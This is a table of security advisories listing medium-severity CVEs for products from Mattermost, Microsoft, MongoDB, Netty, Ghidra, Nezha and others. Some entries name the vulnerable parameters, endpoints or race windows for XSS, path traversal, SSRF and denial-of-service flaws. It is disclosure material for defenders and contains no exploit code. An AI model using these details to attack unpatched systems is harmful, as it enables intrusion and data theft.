| Mattermost--Mattermost | Mattermost versions 11.6.x <= 11.6.1, 11.5.x <= 11.5.4, 10.11.x <= 10.11.15, 10.11.x <= 10.11.16 fail to restrict role_updated websocket event broadcasts to members of the affected team or channel, which allows an authenticated attacker with guest-level access to observe permission scheme change notifications for private teams they are not a member of via the websocket connection. Mattermost Advisory ID: MMSA-2026-00616 | 2026-06-12 | 4.3 | CVE-2026-3433 |
| Mattermost--Mattermost | Mattermost versions 11.6.x <= 11.6.1, 11.5.x <= 11.5.4, 10.11.x <= 10.11.15, 10.11.x <= 10.11.16 fail to enforce PermissionInviteUser when setting AllowOpenInvite or AllowedDomains during team creation (the check was only applied on update/patch), which allows an authenticated user holding PermissionCreateTeam but not PermissionInviteUser on the resulting team to configure invite-controlled team settings (make the team publicly joinable via open invite and/or constrain membership via allowed domains) that they are not permitted to set on an existing team, via POST /api/v4/teams with allow_open_invite: true and/or a non-empty allowed_domains in the request body. Mattermost Advisory ID: MMSA-2026-00655 | 2026-06-12 | 4.3 | CVE-2026-6689 |
| maxfoundry--WP-Paginate | WordPress Plugin WP-Paginate 2.1.3 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by manipulating the preset parameter. Attackers can submit POST requests to the plugin settings page with script payloads in the preset parameter that are stored and executed when administrators view the settings. | 2026-06-08 | 6.4 | CVE-2021-47982 |
| metal3-io--ip-address-manager | IPAM is the IP address Manager for Cluster API Provider Metal3. Prior to versions 1.11.7, 1.12.4, and 1.13.0, the IPAM controller's ClusterRole granted full CRUD permissions (create, delete, get, list, patch, update, watch) on core/v1 Secrets. The controller never accesses Secrets during normal operation. If the controller pod were compromised (e.g. via supply chain attack or container escape), an attacker could leverage these excessive permissions to read, modify, or delete Secrets in the namespace, potentially exposing credentials and other sensitive data. This issue has been patched in versions 1.11.7, 1.12.4, and 1.13.0. | 2026-06-12 | 4.4 | CVE-2026-47190 |
| Microsoft--.NET 10.0 | Improper link resolution before file access ('link following') in .NET allows an unauthorized attacker to perform tampering locally. | 2026-06-09 | 6.2 | CVE-2026-45491 |
| Microsoft--Microsoft 365 Apps for Enterprise | Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information locally. | 2026-06-09 | 5.5 | CVE-2026-44821 |
| Microsoft--Microsoft 365 Apps for Enterprise | Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information locally. | 2026-06-09 | 4.7 | CVE-2026-45460 |
| Microsoft--Microsoft Bing Search for Android | User interface (ui) misrepresentation of critical information in Microsoft Bing allows an unauthorized attacker to perform spoofing over a network. | 2026-06-09 | 4.3 | CVE-2026-45650 |
| Microsoft--Microsoft Defender for Endpoint for Mac | Time-of-check time-of-use (toctou) race condition in Microsoft Defender for Endpoint allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 5.5 | CVE-2026-45647 |
| Microsoft--Microsoft Exchange Server 2016 Cumulative Update 23 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Exchange Server allows an unauthorized attacker to perform spoofing over a network. | 2026-06-09 | 6.1 | CVE-2026-45500 |
| Microsoft--Microsoft Exchange Server 2016 Cumulative Update 23 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Exchange Server allows an unauthorized attacker to perform spoofing over a network. | 2026-06-09 | 6.5 | CVE-2026-45501 |
| Microsoft--Microsoft Exchange Server 2016 Cumulative Update 23 | Server-side request forgery (ssrf) in Microsoft Exchange Server allows an authorized attacker to disclose information over a network. | 2026-06-09 | 5 | CVE-2026-45502 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper limitation of a pathname to a restricted directory ('path traversal') in Microsoft Office SharePoint allows an authorized attacker to execute code over a network. | 2026-06-09 | 6.5 | CVE-2026-45454 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 5.4 | CVE-2026-33113 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 5.4 | CVE-2026-45453 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 5.4 | CVE-2026-45464 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 5.4 | CVE-2026-45465 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 5.4 | CVE-2026-47636 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 5.4 | CVE-2026-47639 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 5.4 | CVE-2026-48560 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 4.6 | CVE-2026-45462 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 4.6 | CVE-2026-45467 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 4.6 | CVE-2026-45468 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 4.6 | CVE-2026-45479 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office Project Server allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 4.6 | CVE-2026-45483 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 4.6 | CVE-2026-47637 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 4.6 | CVE-2026-47638 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 4.6 | CVE-2026-47640 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 4.6 | CVE-2026-47641 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 4.6 | CVE-2026-48562 |
| Microsoft--Visual Studio Code | Exposure of sensitive information to an unauthorized actor in Visual Studio Code allows an unauthorized attacker to disclose information over a network. | 2026-06-09 | 6.5 | CVE-2026-47284 |
| Microsoft--Visual Studio Code | Relative path traversal in Visual Studio Code allows an unauthorized attacker to perform tampering over a network. | 2026-06-09 | 6.5 | CVE-2026-47287 |
| Microsoft--Windows 10 Version 1607 | Null pointer dereference in Windows Kerberos allows an authorized attacker to deny service over a network. | 2026-06-09 | 6.5 | CVE-2026-42903 |
| Microsoft--Windows 10 Version 1607 | Out-of-bounds read in Windows DHCP Server allows an authorized attacker to disclose information locally. | 2026-06-09 | 6.8 | CVE-2026-45608 |
| Microsoft--Windows 10 Version 1607 | Protection mechanism failure in Windows BitLocker allows an unauthorized attacker to bypass a security feature with a physical attack. | 2026-06-09 | 6.8 | CVE-2026-50507 |
| Microsoft--Windows 10 Version 1607 | Exposure of sensitive information to an unauthorized actor in Windows NTLM allows an unauthorized attacker to perform spoofing over a network. | 2026-06-09 | 6.5 | CVE-2026-50508 |
| Microsoft--Windows 10 Version 1607 | Windows Kerberos Denial of Service Vulnerability | 2026-06-09 | 5.3 | CVE-2026-42914 |
| Microsoft--Windows 10 Version 1607 | Out-of-bounds read in Windows Telephony Service allows an authorized attacker to disclose information locally. | 2026-06-09 | 5.5 | CVE-2026-42968 |
| Microsoft--Windows 10 Version 1607 | Use of uninitialized resource in Windows Push Notifications allows an authorized attacker to disclose information locally. | 2026-06-09 | 5.5 | CVE-2026-42969 |
| Microsoft--Windows 10 Version 1607 | Use of uninitialized resource in Windows Push Notifications allows an authorized attacker to disclose information locally. | 2026-06-09 | 5.5 | CVE-2026-42970 |
| Microsoft--Windows 10 Version 1607 | Use of uninitialized resource in Windows Push Notifications allows an authorized attacker to disclose information locally. | 2026-06-09 | 5.5 | CVE-2026-42971 |
| Microsoft--Windows 10 Version 1607 | Exposure of sensitive information to an unauthorized actor in Windows Hyper-V allows an authorized attacker to disclose information locally. | 2026-06-09 | 5.5 | CVE-2026-42972 |
| Microsoft--Windows 10 Version 1607 | Use of uninitialized resource in Windows Push Notifications allows an authorized attacker to disclose information locally. | 2026-06-09 | 5.5 | CVE-2026-42973 |
| Microsoft--Windows 10 Version 1607 | Exposure of sensitive information to an unauthorized actor in Windows Application Identity (AppID) Subsystem allows an authorized attacker to disclose information locally. | 2026-06-09 | 5.5 | CVE-2026-45594 |
| Microsoft--Windows 10 Version 1607 | Protection mechanism failure in Windows Mark of the Web (MOTW) allows an unauthorized attacker to bypass a security feature over a network. | 2026-06-09 | 5.4 | CVE-2026-45595 |
| Microsoft--Windows 10 Version 1607 | Out-of-bounds read in Microsoft UxTheme Library (uxtheme.dll) allows an authorized attacker to deny service locally. | 2026-06-09 | 5.5 | CVE-2026-45606 |
| Microsoft--Windows 10 Version 1607 | Out-of-bounds read in Windows DHCP Server allows an authorized attacker to disclose information locally. | 2026-06-09 | 5.5 | CVE-2026-45634 |
| Microsoft--Windows 10 Version 1607 | Protection mechanism failure in Windows BitLocker allows an unauthorized attacker to bypass a security feature with a physical attack. | 2026-06-09 | 5.3 | CVE-2026-45655 |
| Microsoft--Windows 10 Version 1809 | Exposure of sensitive information to an unauthorized actor in Windows Shell allows an authorized attacker to disclose information locally. | 2026-06-09 | 6.5 | CVE-2026-42907 |
| Microsoft--Windows 10 Version 21H2 | Exposure of sensitive information to an unauthorized actor in Windows Shell allows an authorized attacker to disclose information locally. | 2026-06-09 | 5.5 | CVE-2026-42906 |
| Microsoft--Windows 10 Version 21H2 | Incorrect calculation of buffer size in Windows TCP/IP allows an authorized attacker to deny service over an adjacent network. | 2026-06-09 | 5.7 | CVE-2026-42915 |
| Microsoft--Windows 11 version 23H2 | Out-of-bounds read in Windows Application Identity (AppID) Subsystem allows an authorized attacker to disclose information locally. | 2026-06-09 | 5.5 | CVE-2026-45604 |
| Microsoft--Windows 11 Version 24H2 | Out-of-bounds read in Windows DWM Core Library allows an authorized attacker to disclose information locally. | 2026-06-09 | 5.5 | CVE-2026-48566 |
| Microsoft--Windows 11 version 26H1 | Out-of-bounds read in Windows DWM Core Library allows an authorized attacker to disclose information locally. | 2026-06-09 | 5.5 | CVE-2026-44814 |
| Microsoft--Windows Server 2019 | Use after free in Windows Network Controller (NC) Host Agent allows an authorized attacker to deny service locally. | 2026-06-09 | 5.5 | CVE-2026-44805 |
| moby--moby | Moby is an open source container framework. In Docker Engine prior to version 29.5.1, Docker Daemon versions 28.5.2 and prior, and Moby Daemon prior to version 2.0.0-beta.14, a race condition during docker cp mount setup allows a malicious container to create empty files or directories at arbitrary absolute paths on the host filesystem. This issue has been patched in Docker Engine version 29.5.1 and Moby Daemon version 2.0.0-beta.14. | 2026-06-12 | 6.1 | CVE-2026-41568 |
| Mohammed-eid35--bank-management-system-springboot | A security vulnerability has been detected in Mohammed-eid35 bank-management-system-springboot up to 7b9bcc65ad7df3db29af71aed9bb500e5f24d948. This affects an unknown part of the file src/main/java/com/alien/bank/management/system/controller/TransactionController.java of the component Transaction Endpoint. Such manipulation leads to improper authorization. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. This product takes the approach of rolling releases to provide continuous delivery. Therefore, version details for affected and updated releases are not available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-08 | 6.3 | CVE-2026-11521 |
| MongoDB--MongoDB | An authenticated user with the read role may read limited amounts of uninitialized stack memory via specially-crafted issuances of the filemd5 command. | 2026-06-09 | 6.5 | CVE-2026-9754 |
| MongoDB--MongoDB Server | A bug in query analysis processing of the $vectorSearch aggregation stage for Queryable Encryption (QE) or Client-Side Field Level Encryption (CSFLE) results in literal values for encrypted fields within the $vectorSearch stage filter expressions being sent to the server as plaintext instead of ciphertext. | 2026-06-09 | 6.5 | CVE-2026-9741 |
| MongoDB--MongoDB Server | When using $changestreams and $_requestReshardingResumeToken with the exchange option, the server hits an invariant which causes the server to crash. No special privileges are needed, but the user must be logged in to issue the statement. | 2026-06-09 | 6.5 | CVE-2026-9746 |
| MongoDB--MongoDB Server | Adding fromRouter:true and runtimeConstants.userRoles could cause aggregations to crash mongodb server. | 2026-06-09 | 6.5 | CVE-2026-9747 |
| MongoDB--MongoDB Server | The $_internalConvertBucketIndexStats stage used PauseExecution as a way to signal "skip this document" when an index stats conversion failed. PauseExecution, however, is not a general-purpose skip mechanism but a TeeBuffer-internal signal used solely by $facet to coordinate its sub-pipelines. When this stage is placed before $facet in a pipeline, TeeBuffer receives the unexpected PauseExecution from upstream and hits a hard invariant assertion, crashing mongod. | 2026-06-09 | 6.5 | CVE-2026-9748 |
| MongoDB--MongoDB Server | This issue can occur when running an aggregation pipeline that uses the internal $exchange stage configured with key-range partitioning and order-preserving delivery. If a single key range produces enough documents to fill its exchange buffer (that is, many results are routed to the same consumer), the server reaches the code path where a full per-consumer buffer is detected but the internal "high watermark" for that key range is not updated as intended. | 2026-06-09 | 6.5 | CVE-2026-9749 |
| MongoDB--MongoDB Server | An authenticated user can cause a MongoDB server to crash or return incorrect results by creating documents that interfere with internal metadata processing during query execution. This stems from insufficient separation between user-controlled document fields and internal metadata in certain execution paths. | 2026-06-09 | 6.5 | CVE-2026-9750 |
| MongoDB--MongoDB Server | An authorized user could trigger a server crash by running a query with a 2dsphere index on a field that stores a GeoJSON GeometryCollection containing a Polygon with a strict-winding CRS. Strict-winding polygons are intentionally unsupported for indexing, but the guard that rejects them does not inspect members of a GeometryCollection, allowing the unsafe path to be reached, which ends in a null-pointer dereference. | 2026-06-09 | 6.5 | CVE-2026-9752 |
| MongoDB--MongoDB Server | MongoDB server may log authentication parameters, including credentials, to the server log during SASL authentication. When connection health metric logging is enabled, the full authentication parameters are written to the log without redaction. | 2026-06-09 | 5.5 | CVE-2026-9735 |
| MongoDB--MongoDB Server | The ldapQueryPassword parameter, when set through the runtime setParameter command, will log the new password to the mongod.log file in plain text. | 2026-06-09 | 5.5 | CVE-2026-9751 |
| MongoDB--MongoDB server | In MongoDB Server 8.0, an aggregation stage can leave its _subPipeline field null during processing of certain pipelines. If a getMore is subsequently issued on the same cursor, the server may dereference this null sub-pipeline when reattaching to the operation context, accessing an invalid address and crashing the process. This issue allows an authenticated user who can run aggregation pipelines to cause a denial of service by issuing a specially crafted aggregation followed by getMore on affected versions. | 2026-06-09 | 6.5 | CVE-2026-9743 |
| Moovit--Bus & Public Transit App | A flaw has been found in Moovit Bus & Public Transit App 1.18 on Android. This affects an unknown part of the component com.tranzmate. Executing a manipulation can lead to improper authorization in handler for custom url scheme. The attack can only be executed locally. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-14 | 5.3 | CVE-2026-12189 |
| mra13--Accept Stripe Payments | WordPress Plugin Stripe Payments 2.0.39 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts through the AcceptStripePayments-settings[currency_code] parameter. Attackers can submit POST requests to /wp-admin/options.php with script payloads in the currency_code field to execute arbitrary JavaScript in administrator browsers when settings are viewed. | 2026-06-08 | 6.4 | CVE-2021-47983 |
| myasui--WP Vault | WP Vault 0.8.6.6 contains a local file inclusion vulnerability that allows unauthenticated attackers to read arbitrary files by exploiting an unescaped parameter in the include functionality. Attackers can supply directory traversal sequences through the wpv-image GET parameter to access sensitive files like system configuration and credentials. | 2026-06-09 | 6.2 | CVE-2016-20064 |
| nationalsecurityagency--ghidra | Ghidra before 12.1 contains a heap-use-after-free vulnerability in SleighBuilder::generatePointerAdd caused by iterator invalidation when PcodeCacher::allocateInstruction reallocates the issued vector. Attackers can trigger memory corruption by decompiling malicious binaries through the public Sleigh::oneInstruction C++ API, affecting downstream SLEIGH library consumers. | 2026-06-10 | 6.1 | CVE-2026-49496 |
| nationalsecurityagency--ghidra | Ghidra 10.2 before 12.1 contains an uncontrolled resource consumption vulnerability in ExportTrie.parseTrie() that lacks cycle detection when traversing Mach-O binary export tries. A crafted Mach-O binary with circular references in the export trie causes unbounded queue growth and exponential string concatenation, triggering OutOfMemoryError that crashes the entire JVM and loses all unsaved work. | 2026-06-10 | 5.5 | CVE-2026-49495 |
| nationalsecurityagency--ghidra | Ghidra before 12.0.3 contains an out-of-memory vulnerability in the rust_demangle function that allocates unbounded output buffers without size limits. Attackers can craft malicious Rust symbol names in binaries to trigger exponential memory allocation, causing process crashes during binary analysis. | 2026-06-10 | 5.5 | CVE-2026-52753 |
| nationalsecurityagency--ghidra | Ghidra before 12.2 contains an unauthenticated path traversal vulnerability in the IsfServer that accepts TCP connections and passes client-supplied namespace strings directly to filesystem operations without validation. Remote attackers can connect to port 54321 and send crafted protobuf messages with traversal sequences to enumerate filesystem paths and probe arbitrary files. | 2026-06-10 | 4.8 | CVE-2026-52756 |
| nationalsecurityagency--ghidra | Ghidra before 12.1 contains a heap-use-after-free vulnerability in the decompiler's HighVariable::merge() function during the variable merging pass. Attackers can trigger this vulnerability by crafting a binary that causes stale pointers in the HighIntersectTest::highedgemap cache to be dereferenced, reading and writing the flags field of freed heap memory when a user opens the binary in Ghidra's decompiler view. | 2026-06-10 | 4.4 | CVE-2026-52757 |
| Naxclow--Smart Doorbell X3 | Naxclow device identifiers use fixed manufacturing prefixes combined with sequential counters, producing a fully predictable and enumerable identifier space. Because the platform also exposes an endpoint that reveals the current identifier high-water mark, the active fleet can be enumerated. | 2026-06-12 | 5.3 | CVE-2026-42932 |
| Naxclow--Smart Doorbell X3 | The Naxclow platform exposes a registration endpoint that accepts signed requests containing a batch prefix and an arbitrary caller-supplied account identifier, without validating any ownership relationship. Each call mints a new sequential device identifier and returns the current high-water counter value for the batch, allowing callers to measure and enumerate the active device space. The endpoint's behavior enables precise fleet enumeration. | 2026-06-12 | 5.3 | CVE-2026-50244 |
| Naxclow--Smart Doorbell X3 | During WiFi association, Naxclow device firmware prints the host network's SSID, PSK, and negotiated WPA keys in cleartext to an exposed UART console on production hardware. The UART pads are labeled, run with default serial settings, and drop to an interactive RT-Thread shell that permits arbitrary memory reads, enabling full firmware extraction. An attacker with brief physical access, common for outdoor-mounted devices, can therefore recover WiFi credentials and bootstrap firmware-side attacks. | 2026-06-12 | 4.6 | CVE-2026-50099 |
| Neovim--Neovim | A flaw has been found in Neovim up to 0.12.2. Affected by this issue is the function M.read of the file runtime/lua/vim/secure.lua of the component View Branch. Executing a manipulation of the argument path can lead to command injection. It is possible to launch the attack on the local host. The exploit has been published and may be used. This patch is called f83e0dcaf8cf18de94828341b0a1a61a86c75baf. A patch should be applied to remediate this issue. | 2026-06-08 | 5.3 | CVE-2026-11487 |
| nesquena--hermes-webui | Hermes WebUI before version 0.51.269 contains a profile isolation bypass vulnerability that allows authenticated users to access data belonging to other profiles by querying the session search endpoint without active-profile filtering. Attackers can send requests to the sessions search handler to retrieve session titles and transcript message content from profiles other than their own active profile. | 2026-06-09 | 6.5 | CVE-2026-49956 |
| nesquena--hermes-webui | Hermes WebUI before version 0.51.270 contains a resource exhaustion vulnerability that allows unauthenticated remote attackers to degrade service availability by repeatedly calling the passkey options endpoint without completing assertion. Attackers can send unlimited POST requests to the authentication endpoint, causing unbounded growth of the challenge store file and excessive CPU and disk I/O through repeated JSON file rewrites. | 2026-06-09 | 5.3 | CVE-2026-49955 |
| nesquena--hermes-webui | Hermes WebUI before version 0.51.303 contains a time-of-check time-of-use (TOCTOU) race condition vulnerability in the git_discard function within api/workspace_git.py that allows attackers to delete files outside the configured workspace boundary by replacing a validated path component with a symlink after validation but before deletion. Attackers can substitute a workspace-controlled path component with a symlink pointing to an external directory between the safe_resolve_ws() validation step and the subsequent Path.unlink() or shutil.rmtree() deletion call, causing the delete operation to follow the symlink and remove arbitrary files outside the workspace. | 2026-06-09 | 5 | CVE-2026-49958 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, Netty's DNS resolver uses a predictable PRNG for generating DNS transaction IDs and defaults to a static UDP source port. This combination reduces the entropy of DNS queries, enabling DNS Cache Poisoning (Kaminsky attack). Versions 4.1.135.Final and 4.2.15.Final patch the issue. | 2026-06-12 | 6.8 | CVE-2026-45673 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, DefaultHttp2Connection.DefaultEndpoint initialises maxActiveStreams/maxStreams to Integer.MAX_VALUE, and Http2Settings never inserts SETTINGS_MAX_CONCURRENT_STREAMS by default (Http2Settings.java:305-307 only clamps a user-supplied value). Unless the application explicitly calls initialSettings().maxConcurrentStreams(n), a Netty HTTP/2 server advertises no limit and enforces none locally. Each open stream allocates a DefaultStream object, PropertyMap slots, flow-controller state and IntObjectHashMap entry; with ~2^30 permissible odd stream IDs a single TCP connection can create hundreds of thousands of long-lived stream objects. This is also the precondition for CVE-2023-44487-style Rapid-Reset amplification, where the absence of a low concurrent cap multiplies backend work. Versions 4.1.135.Final and 4.2.15.Final patch the issue. | 2026-06-12 | 5.3 | CVE-2026-47244 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. In netty-codec-http2 prior to versions 4.1.135.Final and 4.2.15.Final, the `DelegatingDecompressorFrameListener` class orchestrates HTTP/2 decompression by embedding a per-stream `EmbeddedChannel` that runs the appropriate decompression codec (gzip, deflate, zstd) and forwards decompressed chunks to a wrapped listener. Each decompressed chunk is a pooled `ByteBuf` handed to an anonymous `ChannelInboundHandlerAdapter` tail handler, which becomes the sole owner responsible for releasing it. A remote peer could send frames that would cause the flow-controller to throw and so trigger a resource leak, which could eventually take down the whole JVM due to an OOME. Versions 4.1.135.Final and 4.2.15.Final patch the issue. | 2026-06-12 | 5.3 | CVE-2026-48043 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, before reading the first request-line, `HttpObjectDecoder` skips every byte for which `Character.isISOControl(b)` is `true` (0x00-0x1F and 0x7F) as well as all whitespace. RFC 9112 §2.2 only asks servers to ignore empty CRLF lines preceding the request-line - a carefully scoped robustness allowance intended to handle HTTP/1.0 POST workarounds. Silently absorbing NUL bytes, SOH, STX, and other non-CRLF control characters goes significantly beyond this, and can be exploited for request-boundary confusion in pipelined or multiplexed transports where a front-end component treats those bytes differently. Versions 4.1.135.Final and 4.2.15.Final patch the issue. | 2026-06-12 | 5.3 | CVE-2026-50020 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, netty_unix_socket_recvFd sets msg_control to `char control[CMSG_SPACE(sizeof(int))]` (line 940) - 24 bytes on 64-bit Linux. A peer-sent SCM_RIGHTS cmsg carrying two ints has cmsg_len = CMSG_LEN(8) = 24, which fits exactly with no MSG_CTRUNC, so the kernel installs both fds in the receiving process. The subsequent check `cmsg->cmsg_len == CMSG_LEN(sizeof(int))` (line 972, expected 20) fails, the branch that would read the fd is skipped, and neither installed fd is closed. The for(;;) loop calls recvmsg again (non-blocking → EAGAIN → Java maps to 0 → read loop exits normally), leaving two leaked fds per message. There is no MSG_CTRUNC handling. Reachable via Epoll/KQueue DomainSocketChannel when the application opts into DomainSocketReadMode.FILE_DESCRIPTORS (non-default). Versions 4.1.135.Final and 4.2.15.Final patch the issue. | 2026-06-12 | 4 | CVE-2026-45536 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. Prior to version 4.2.15.Final, Netty QUIC exposes the stateless reset token on the network path when using the default HMAC-based connection-ID and stateless-reset-token generators. The reset token for the server's current source connection ID can be derived from bytes that appear as the connection ID in QUIC headers after a source-CID rotation. An on-path attacker observing the headers can use the token to perform a Denial of Service by sending a spoofed Stateless Reset packet. Version 4.2.15.Final patches the issue. | 2026-06-12 | 4.8 | CVE-2026-50009 |
| nezhahq--nezha | Nezha Monitoring is a self-hostable, lightweight, servers and websites monitoring and O&M tool. From version 1.4.0 to before version 2.0.9, any authenticated non-admin member can connect to the server-status WebSocket and receive telemetry for all servers, including servers owned by other users. The normal server list API filters objects by HasPermission, but the WebSocket stream treats the presence of any authenticated user as authorization for the full unfiltered server list. This issue has been patched in version 2.0.9. | 2026-06-12 | 6.5 | CVE-2026-47124 |
| nezhahq--nezha | Nezha Monitoring is a self-hostable, lightweight, servers and websites monitoring and O&M tool. From version 0.20.0 to before version 2.0.10, an authenticated Nezha dashboard user can create or update a DDNS profile with provider webhook and configure an arbitrary webhook_url, HTTP method, request body, and headers. When DDNS is triggered for a server that uses that profile, the dashboard process sends the configured request with utils.HttpClient without the SSRF protections used by notification webhooks. This allows a low-privileged authenticated user who controls an owned server/DDNS profile to make the dashboard host issue HTTP requests to loopback or internal network services. The response body is not returned to the attacker in the confirmed path, so this is a blind SSRF / internal state-changing request primitive. This issue has been patched in version 2.0.10. | 2026-06-12 | 6.4 | CVE-2026-47268 |
| nezhahq--nezha | Nezha Monitoring is a self-hostable, lightweight, servers and websites monitoring and O&M tool. From version 2.0.14 to before version 2.1.0, authenticated users can claim the dashboard Host through NAT and preempt all dashboard routing. This issue has been patched in version 2.1.0. | 2026-06-12 | 6.5 | CVE-2026-53520 |
| nezhahq--nezha | Nezha Monitoring is a self-hostable, lightweight, servers and websites monitoring and O&M tool. From version 2.0.14 to before version 2.1.0, PATCH /server/{id} accepts and persists nonexistent ddns_profiles IDs for a member-owned server. If another user later creates a DDNS profile with one of those IDs, the DDNS worker resolves the stored ID and dispatches an update using the other user's DDNS profile configuration in the context of the attacker's server. This issue has been patched in version 2.1.0. | 2026-06-12 | 6.4 | CVE-2026-53521 |
| nezhahq--nezha | Nezha Monitoring is a self-hostable, lightweight, servers and websites monitoring and O&M tool. From version 1.0.0 to before version 2.2.0, the Nezha dashboard exposes two endpoints that create long-lived WebSocket streams to monitored agents: POST /api/v1/terminal → createTerminal() (terminal.go:27-67) and POST /api/v1/file → createFM() (fm.go:28-67). Both call rpc.NezhaHandlerSingleton.CreateStream(streamId, ...) which inserts a new ioStreamContext into an unbounded map[string]*ioStreamContext (s.ioStreams in io_stream.go:59-67). There is no per-user rate limit, no global semaphore, and no per-server connection cap. This issue has been patched in version 2.2.0. | 2026-06-12 | 6.5 | CVE-2026-53522 |
| nezhahq--nezha | Nezha Monitoring is a self-hostable, lightweight, servers and websites monitoring and O&M tool. From version 1.0.0 to before version 2.2.0, the getRedirectURL function in oauth2.go:22-29 constructs the OAuth2 callback URL by concatenating the request's Host header with a fixed path, with zero validation of the Host header. This can result in host header injection. This issue has been patched in version 2.2.0. | 2026-06-12 | 6.8 | CVE-2026-53523 |
| nezhahq--nezha | Nezha Monitoring is a self-hostable, lightweight, servers and websites monitoring and O&M tool. From version 2.0.0 to before version 2.0.14, private services (`EnableShowInService: false`) are enumerable via per-server endpoints, leaking name and timing data. This issue has been patched in version 2.0.14. | 2026-06-12 | 5.3 | CVE-2026-49397 |
| nimiq--core-rs-albatross | Nimiq is a Rust implementation of the Nimiq Proof-of-Stake protocol based on the Albatross consensus algorithm. Prior to version 1.4.0, when LightBlockchain::rebranch() adopts a fork chain whose tip is a macro block (checkpoint or election), it only updates self.head but fails to update self.macro_head, self.election_head, self.current_validators, or store the election header in the chain_store. This is in direct contrast with the full Blockchain::rebranch() at blockchain/src/blockchain/push.rs:504-518, which correctly updates all macro/election state when the new head is a macro block. After a rebranch to a macro block, the stale macro_head causes subsequent macro blocks pushed via push() to be verified against the wrong predecessor via verify_macro_successor(&this.macro_head). If the rebranch target was an election block, the stale current_validators causes every subsequent block to fail verify_validators(), completely stalling the light client's chain progression. This issue has been patched in version 1.4.0. | 2026-06-09 | 6.5 | CVE-2026-46540 |
| nimiq--core-rs-albatross | Nimiq is a Rust implementation of the Nimiq Proof-of-Stake protocol based on the Albatross consensus algorithm. network-libp2p handles kad get-record query progress in handle_dht_get (network-libp2p/src/swarm.rs). Prior to version 1.4.0, when a peer returns a FoundRecord, the code verifies the record via dht_verifier.verify(&record.record). On verifier error, handle_dht_get logs and returns early without completing the oneshot used by Network::dht_get, and without cleaning up per-query bookkeeping. Later query progress can hit the "DHT inconsistent state" path and also return without cleanup. Because Network::dht_get awaits the oneshot without a timeout, the caller future can hang indefinitely. This issue has been patched in version 1.4.0. | 2026-06-09 | 5.3 | CVE-2026-44505 |
